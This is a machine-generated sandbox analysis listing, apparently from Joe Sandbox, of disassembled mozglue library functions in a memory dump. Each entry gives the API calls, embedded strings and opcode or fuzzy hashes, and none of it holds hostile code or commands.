                                                                                      • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C0EB57E
                                                                                      • free.MOZGLUE(00000000), ref: 6C0EB58F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                      • String ID:
                                                                                      • API String ID: 4244350000-0
                                                                                      • Opcode ID: 240f7c24dcca6a3c937fbb97104c0f3cf4e04103db37dd3a9ce52d02d6f9f2d0
                                                                                      • Instruction ID: b457c6057a9f3acf62c4d9c5e3082e9329920b400ebe2ca612b3e91acf7e0ae4
                                                                                      • Opcode Fuzzy Hash: 240f7c24dcca6a3c937fbb97104c0f3cf4e04103db37dd3a9ce52d02d6f9f2d0
                                                                                      • Instruction Fuzzy Hash: 3121B6726002059FDB008F65CC40BAABBF9FF46314F284129E925DB341E775D951C7A5
                                                                                      APIs
                                                                                      • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C0EB7CF
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C0EB808
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C0EB82C
                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C0EB840
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0EB849
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
                                                                                      • String ID:
                                                                                      • API String ID: 1977084945-0
                                                                                      • Opcode ID: b6e5819dddf4e061ee24c70f0fedd7c1b77c39a499f873ec2f78b136bbc57ba2
                                                                                      • Instruction ID: b9241a174b98299a5a881b8928a9e85554fa20498398c09e79cd39e67240bdec
                                                                                      • Opcode Fuzzy Hash: b6e5819dddf4e061ee24c70f0fedd7c1b77c39a499f873ec2f78b136bbc57ba2
                                                                                      • Instruction Fuzzy Hash: C42148B4E002099FDF04DFA9C8856BEBBF4EF49314F14812AEC45A7301E731A944CBA1
                                                                                      APIs
                                                                                      • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C146E78
                                                                                        • Part of subcall function 6C146A10: InitializeCriticalSection.KERNEL32(6C16F618), ref: 6C146A68
                                                                                        • Part of subcall function 6C146A10: GetCurrentProcess.KERNEL32 ref: 6C146A7D
                                                                                        • Part of subcall function 6C146A10: GetCurrentProcess.KERNEL32 ref: 6C146AA1
                                                                                        • Part of subcall function 6C146A10: EnterCriticalSection.KERNEL32(6C16F618), ref: 6C146AAE
                                                                                        • Part of subcall function 6C146A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C146AE1
                                                                                        • Part of subcall function 6C146A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C146B15
                                                                                        • Part of subcall function 6C146A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C146B65
                                                                                        • Part of subcall function 6C146A10: LeaveCriticalSection.KERNEL32(6C16F618,?,?), ref: 6C146B83
                                                                                      • MozFormatCodeAddress.MOZGLUE ref: 6C146EC1
                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C146EE1
                                                                                      • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C146EED
                                                                                      • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C146EFF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                                      • String ID:
                                                                                      • API String ID: 4058739482-0
                                                                                      • Opcode ID: 0e862ab470d156fc78e6a467b29ea626a4455de81492b42a57b92db4590d0e07
                                                                                      • Instruction ID: a3583b8c384e637b1614485aab94e15ebbd7c5f51c62beb59b712bdee6068fcd
                                                                                      • Opcode Fuzzy Hash: 0e862ab470d156fc78e6a467b29ea626a4455de81492b42a57b92db4590d0e07
                                                                                      • Instruction Fuzzy Hash: D121A471A0421D9FDB00CF69D8856EA7BF5EF84308F048079E84997351DB749A59CF92
                                                                                      APIs
                                                                                      • WideCharToMultiByte.KERNEL32 ref: 6C1476F2
                                                                                      • moz_xmalloc.MOZGLUE(00000001), ref: 6C147705
                                                                                        • Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26
                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C147717
                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C14778F,00000000,00000000,00000000,00000000), ref: 6C147731
                                                                                      • free.MOZGLUE(00000000), ref: 6C147760
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                                      • String ID:
                                                                                      • API String ID: 2538299546-0
                                                                                      • Opcode ID: 2bd71f307e41d328453648f15e133ae0010811bc75445f0fbabfde4751e5b72c
                                                                                      • Instruction ID: c178e9d4cd329dc04c161cd2818be4cbf354e0957cc2449246bc810d4628ce3a
                                                                                      • Opcode Fuzzy Hash: 2bd71f307e41d328453648f15e133ae0010811bc75445f0fbabfde4751e5b72c
                                                                                      • Instruction Fuzzy Hash: 3E11C4B19012156BE710AF768C44BABBEF8EF45354F04452AF888E7300E7749844CBE2
                                                                                      APIs
                                                                                      • ??KDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 6C149B74
                                                                                      • ?ceil@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 6C149BBA
                                                                                      • ?floor@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 6C149BC8
                                                                                      • ??DDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 6C149BD7
                                                                                      • ??GDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?,?,?), ref: 6C149BE0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Decimal@blink@@$V01@V01@@$V12@$?ceil@?floor@
                                                                                      • String ID:
                                                                                      • API String ID: 2380687156-0
                                                                                      • Opcode ID: 70b9e999d61d9d94f254991004b4081cc13dc5c46e554888d1ab8acff5d07302
                                                                                      • Instruction ID: a65b33a013b4d95cc3a6eb20cb367738c0745aeb49d8ccc3bf2b596785d4fce4
                                                                                      • Opcode Fuzzy Hash: 70b9e999d61d9d94f254991004b4081cc13dc5c46e554888d1ab8acff5d07302
                                                                                      • Instruction Fuzzy Hash: 07117371514344A78700DF688D50C9BB7BCFFC6264F04CA0DF99546640DB35D548C792
                                                                                      APIs
                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C0E3DEF), ref: 6C120D71
                                                                                      • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C0E3DEF), ref: 6C120D84
                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C0E3DEF), ref: 6C120DAF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$Free$Alloc
                                                                                      • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                      • API String ID: 1852963964-2186867486
                                                                                      • Opcode ID: 61f6af883ca8deb1278aabe7bd80bf596ce55abed98ed857d11f6c2606b0439f
                                                                                      • Instruction ID: 207c972c1e7455fad979b36662bfa25cbe9821e81fdf6a335b4d8a9c29566a79
                                                                                      • Opcode Fuzzy Hash: 61f6af883ca8deb1278aabe7bd80bf596ce55abed98ed857d11f6c2606b0439f
                                                                                      • Instruction Fuzzy Hash: 7AF02E353D239C23E73411770C2AF6A266D6BC2B24F304275F204EEDC0DA9CE49156E4
                                                                                      APIs
                                                                                      • WaitForSingleObject.KERNEL32(000000FF), ref: 6C14586C
                                                                                      • CloseHandle.KERNEL32 ref: 6C145878
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C145898
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C1458C9
                                                                                      • free.MOZGLUE(00000000), ref: 6C1458D3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$CloseHandleObjectSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 1910681409-0
                                                                                      • Opcode ID: ed8c401651a4bbedacee2b4840ae46bc652e8f5b7f626fc0f3cd18b6d45ea0d4
                                                                                      • Instruction ID: bc84250efe9780ad8ad73b7705b68a1354cac1faa04c2c9efd22ae25cdb73c0a
                                                                                      • Opcode Fuzzy Hash: ed8c401651a4bbedacee2b4840ae46bc652e8f5b7f626fc0f3cd18b6d45ea0d4
                                                                                      • Instruction Fuzzy Hash: 8B011975705202DBDF01DF6BDC08B267BB9FB933297248176E52AD2610EB319C25AF81
                                                                                      APIs
                                                                                      • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C1375C4,?), ref: 6C13762B
                                                                                        • Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26
                                                                                      • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C1374D7,6C1415FC,?,?,?), ref: 6C137644
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C13765A
                                                                                      • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C1374D7,6C1415FC,?,?,?), ref: 6C137663
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C1374D7,6C1415FC,?,?,?), ref: 6C137677
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                                                      • String ID:
                                                                                      • API String ID: 418114769-0
                                                                                      • Opcode ID: 796477a316691ba42dbb3b41ab73424dac1b16fb550b1ef5b93dab9b5141cb4c
                                                                                      • Instruction ID: dd58cf927805cec20b1908fb71b450b00f10e1881a930c7e9f663eec77a407d7
                                                                                      • Opcode Fuzzy Hash: 796477a316691ba42dbb3b41ab73424dac1b16fb550b1ef5b93dab9b5141cb4c
                                                                                      • Instruction Fuzzy Hash: 00F0C271E10745ABD7008F22C888676B778FFEA259F114316F90447601E7B0B5D19BD0
                                                                                      APIs
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C141800
                                                                                        • Part of subcall function 6C11CBE8: GetCurrentProcess.KERNEL32(?,6C0E31A7), ref: 6C11CBF1
                                                                                        • Part of subcall function 6C11CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0E31A7), ref: 6C11CBFA
                                                                                        • Part of subcall function 6C0E4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C123EBD,6C123EBD,00000000), ref: 6C0E42A9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentInit_thread_footerTerminatestrlen
                                                                                      • String ID: Details$name${marker.name} - {marker.data.name}
                                                                                      • API String ID: 46770647-1733325692
                                                                                      • Opcode ID: a4d8d61aa5be81b8d76a8a961088dd91d90f2c506b8c6da72656ccc36ffd6bc2
                                                                                      • Instruction ID: 15e803e30f093bdc155bb048a8e85bbe89174faec1462d43e2efbcd6de97e22d
                                                                                      • Opcode Fuzzy Hash: a4d8d61aa5be81b8d76a8a961088dd91d90f2c506b8c6da72656ccc36ffd6bc2
                                                                                      • Instruction Fuzzy Hash: C071F3B1A003469FC704DF69D4547AABBB1FF85304F50866DD8154BB41DB70EAA8CBE1
                                                                                      APIs
                                                                                      • free.MOZGLUE(?,?,6C14B0A6,6C14B0A6,?,6C14AF67,?,00000010,?,6C14AF67,?,00000010,00000000,?,?,6C14AB1F), ref: 6C14B1F2
                                                                                      • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6C14B0A6,6C14B0A6,?,6C14AF67,?,00000010,?,6C14AF67,?,00000010,00000000,?), ref: 6C14B1FF
                                                                                      • free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6C14B0A6,6C14B0A6,?,6C14AF67,?,00000010,?,6C14AF67,?,00000010), ref: 6C14B25F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$Xlength_error@std@@
                                                                                      • String ID: map/set<T> too long
                                                                                      • API String ID: 1922495194-1285458680
                                                                                      • Opcode ID: 11ab0c65280e8f71a75b68339fdc1bbcbbf702b4c661e48252db170a2e38531c
                                                                                      • Instruction ID: e2dffa82b7e6eb792575808b0132fd9a2191c234cf1426d96e2619a3045a8131
                                                                                      • Opcode Fuzzy Hash: 11ab0c65280e8f71a75b68339fdc1bbcbbf702b4c661e48252db170a2e38531c
                                                                                      • Instruction Fuzzy Hash: 6461A774604645CFD701CF19D884A9ABBF2FF5A718F28C1A9D8598BB12C335EC45CBA1
                                                                                      APIs
                                                                                        • Part of subcall function 6C11CBE8: GetCurrentProcess.KERNEL32(?,6C0E31A7), ref: 6C11CBF1
                                                                                        • Part of subcall function 6C11CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0E31A7), ref: 6C11CBFA
                                                                                      • EnterCriticalSection.KERNEL32(6C16E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C11D1C5), ref: 6C10D4F2
                                                                                      • LeaveCriticalSection.KERNEL32(6C16E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C11D1C5), ref: 6C10D50B
                                                                                        • Part of subcall function 6C0ECFE0: EnterCriticalSection.KERNEL32(6C16E784), ref: 6C0ECFF6
                                                                                        • Part of subcall function 6C0ECFE0: LeaveCriticalSection.KERNEL32(6C16E784), ref: 6C0ED026
                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C11D1C5), ref: 6C10D52E
                                                                                      • EnterCriticalSection.KERNEL32(6C16E7DC), ref: 6C10D690
                                                                                      • LeaveCriticalSection.KERNEL32(6C16E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C11D1C5), ref: 6C10D751
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                      • String ID: MOZ_CRASH()
                                                                                      • API String ID: 3805649505-2608361144
                                                                                      • Opcode ID: 6f4c0b275419399a84954bb7bc652da7dbfa21c87265e51360b3479f8306d31f
                                                                                      • Instruction ID: ab222f4c35cb96a1a7dbf79e459f3fa7b683534772ab0449fde8022b2aa81c60
                                                                                      • Opcode Fuzzy Hash: 6f4c0b275419399a84954bb7bc652da7dbfa21c87265e51360b3479f8306d31f
                                                                                      • Instruction Fuzzy Hash: E551CF71B087018FD324DF29C59472AB7E5EB89344F158A2EE6A9C7F84DB74E810CB91
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: __aulldiv
                                                                                      • String ID: -%llu$.$profiler-paused
                                                                                      • API String ID: 3732870572-2661126502
                                                                                      • Opcode ID: 309460df255729c32b29cf76dfa9b898ab140914e316f0f79a4bcfcfe1560cf3
                                                                                      • Instruction ID: 32e3730577b696665e2da954a4be7b253ab3c8c37a384d03e999f1ee1a4664a5
                                                                                      • Opcode Fuzzy Hash: 309460df255729c32b29cf76dfa9b898ab140914e316f0f79a4bcfcfe1560cf3
                                                                                      • Instruction Fuzzy Hash: 774188B1F047189BCB08DF79D85125EBBF5EF85348F10863DE859ABB41EB3198448781
                                                                                      APIs
                                                                                      • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C15985D
                                                                                      • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C15987D
                                                                                      • MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6C1598DE
                                                                                      Strings
                                                                                      • ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6C1598D9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Printf$Target@mozilla@@$?vprint@Crash
                                                                                      • String ID: ElementAt(aIndex = %zu, aLength = %zu)
                                                                                      • API String ID: 1778083764-3290996778
                                                                                      • Opcode ID: bb80d5697b40361ca578aaa464ac7b2741f06a83dd31adfc7d85595e4b6c45f6
                                                                                      • Instruction ID: f648b15b94948775e4e95b39922c40a35d90c40b8faf2a22bcf43ac6c7adda40
                                                                                      • Opcode Fuzzy Hash: bb80d5697b40361ca578aaa464ac7b2741f06a83dd31adfc7d85595e4b6c45f6
                                                                                      • Instruction Fuzzy Hash: F43138B1B041085FDB14AF5ADC14AEE77A9DF44358F50803DEA1AABB40CB349924CBE1
                                                                                      APIs
                                                                                      • __aulldiv.LIBCMT ref: 6C134721
                                                                                        • Part of subcall function 6C0E4410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C123EBD,00000017,?,00000000,?,6C123EBD,?,?,6C0E42D2), ref: 6C0E4444
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: __aulldiv__stdio_common_vsprintf
                                                                                      • String ID: -%llu$.$profiler-paused
                                                                                      • API String ID: 680628322-2661126502
                                                                                      • Opcode ID: 791718c5278d81f27ad3b2fc4e57b33c85002a8128907cf8898c698a704c2bf2
                                                                                      • Instruction ID: ba8e4d9a577aeaf1393501575cdf01b0f4266925b3bd20ef7da9666558f70a5b
                                                                                      • Opcode Fuzzy Hash: 791718c5278d81f27ad3b2fc4e57b33c85002a8128907cf8898c698a704c2bf2
                                                                                      • Instruction Fuzzy Hash: 87315971F042189BCB08CF6DD89569DBFE6DB88318F15813DE8099BB41E77498048B90
                                                                                      APIs
                                                                                        • Part of subcall function 6C0E4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C123EBD,6C123EBD,00000000), ref: 6C0E42A9
                                                                                      • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C13B127), ref: 6C13B463
                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C13B4C9
                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C13B4E4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: _getpidstrlenstrncmptolower
                                                                                      • String ID: pid:
                                                                                      • API String ID: 1720406129-3403741246
